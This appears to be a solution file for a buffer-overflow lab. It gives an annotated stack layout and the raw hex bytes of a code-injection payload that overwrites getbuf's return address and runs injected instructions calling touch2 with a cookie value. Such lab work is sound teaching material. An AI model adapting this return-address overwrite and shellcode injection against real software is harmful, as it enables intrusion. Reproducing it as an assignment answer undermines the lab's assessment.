/*
  Address
  0x5561dca0    80 dc 61 55 00 00 00 00                      overwriting the return address from getbuf in order to reach the injected code (0x5561dc80)
  0x5561dc95    00 00 00 00 00 00 00 00 00 00 00             some zeros                    could be any other byte encoding
  0x5561dc94    c3                                           ret
  0x5561dc90    48 83 ec 08                                  sub  $0x8,%rsp                decrementing the stack pointer (the stack pointer was incremented because of getbuf's ret instruction)
  0x5561dc85    c7 04 25 a0 dc 61 55 ec 17 40 00             movl $0x4017ec, 0x5561dca0    overwriting the return address another time in order to reach touch2  
  0x5561dc80    bf fa 97 b9 59                               movl $0x59b997fa, %edi        setting the cookie as a parameter to touch2  
  0x5561dc78    00 00 00 00 00 00 00 00                      some zeros                    could be any other byte encoding  
*/

00 00 00 00 00 00 00 00 bf fa 97 b9 59 c7 04 25 a0 dc 61 55 ec 17 40 00 48 83 ec 08 c3 00 00 00 00 00 00 00 00 00 00 00 80 dc 61 55 00 00 00 00
